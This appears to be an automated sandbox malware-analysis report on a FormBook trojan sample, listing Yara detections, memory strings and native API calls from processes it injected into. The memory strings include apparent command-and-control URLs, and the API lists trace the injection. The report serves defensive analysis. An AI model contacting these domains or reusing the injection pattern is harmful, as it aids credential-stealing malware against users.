            Source: OmmtmfniIsg.exe, 00000006.00000002.4649388492.0000000004B63000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.productanalytics.pro/9vwi/
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: schtasks.exe, 00000004.00000003.2596677066.00000000076F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033r
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: schtasks.exe, 00000004.00000002.4648172740.0000000004040000.00000004.10000000.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003420000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=stocksm.fun
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: schtasks.exe, 00000004.00000002.4648172740.0000000004040000.00000004.10000000.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003420000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000040B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.icann.org/resources/pages/non-response-2014-01-29-en
            Source: OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000002F6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042BEA3 NtClose,2_2_0042BEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,2_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D34340 NtSetContextThread,LdrInitializeThunk,4_2_02D34340
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D34650 NtSuspendThread,LdrInitializeThunk,4_2_02D34650
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32AD0 NtReadFile,LdrInitializeThunk,4_2_02D32AD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32AF0 NtWriteFile,LdrInitializeThunk,4_2_02D32AF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32B60 NtClose,LdrInitializeThunk,4_2_02D32B60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02D32EE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32FE0 NtCreateFile,LdrInitializeThunk,4_2_02D32FE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32FB0 NtResumeThread,LdrInitializeThunk,4_2_02D32FB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32F30 NtCreateSection,LdrInitializeThunk,4_2_02D32F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02D32CA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02D32C70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32C60 NtCreateKey,LdrInitializeThunk,4_2_02D32C60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32DD0 NtDelayExecution,LdrInitializeThunk,4_2_02D32DD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02D32DF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02D32D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02D32D30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D335C0 NtCreateMutant,LdrInitializeThunk,4_2_02D335C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D339B0 NtGetContextThread,LdrInitializeThunk,4_2_02D339B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32AB0 NtWaitForSingleObject,4_2_02D32AB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32BF0 NtAllocateVirtualMemory,4_2_02D32BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32BE0 NtQueryValueKey,4_2_02D32BE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32B80 NtQueryInformationFile,4_2_02D32B80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32BA0 NtEnumerateValueKey,4_2_02D32BA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32E80 NtReadVirtualMemory,4_2_02D32E80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32EA0 NtAdjustPrivilegesToken,4_2_02D32EA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32E30 NtWriteVirtualMemory,4_2_02D32E30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32F90 NtProtectVirtualMemory,4_2_02D32F90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32FA0 NtQuerySection,4_2_02D32FA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32F60 NtCreateProcessEx,4_2_02D32F60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32CC0 NtQueryVirtualMemory,4_2_02D32CC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32CF0 NtOpenProcess,4_2_02D32CF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32C00 NtQueryInformationProcess,4_2_02D32C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32DB0 NtEnumerateKey,4_2_02D32DB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D32D00 NtSetInformationFile,4_2_02D32D00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D33090 NtSetValueKey,4_2_02D33090
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D33010 NtOpenDirectoryObject,4_2_02D33010
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D33D70 NtOpenThread,4_2_02D33D70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D33D10 NtOpenProcessToken,4_2_02D33D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00458CE0 NtCreateFile,4_2_00458CE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00458E50 NtReadFile,4_2_00458E50
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00458F50 NtDeleteFile,4_2_00458F50
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00459000 NtClose,4_2_00459000
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0047E1FA0_2_0047E1FA
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004465660_2_00446566
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0044EBBC0_2_0044EBBC
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0044ED9A0_2_0044ED9A
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_03DDD6180_2_03DDD618
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004180132_2_00418013
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8C32_2_0040F8C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8C72_2_0040F8C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8BA2_2_0040F8BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004161FE2_2_004161FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011902_2_00401190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162032_2_00416203
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FAE32_2_0040FAE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB632_2_0040DB63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013E02_2_004013E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023B02_2_004023B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C202_2_00402C20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E4E32_2_0042E4E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DCA72_2_0040DCA7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401F302_2_00401F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027B02_2_004027B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
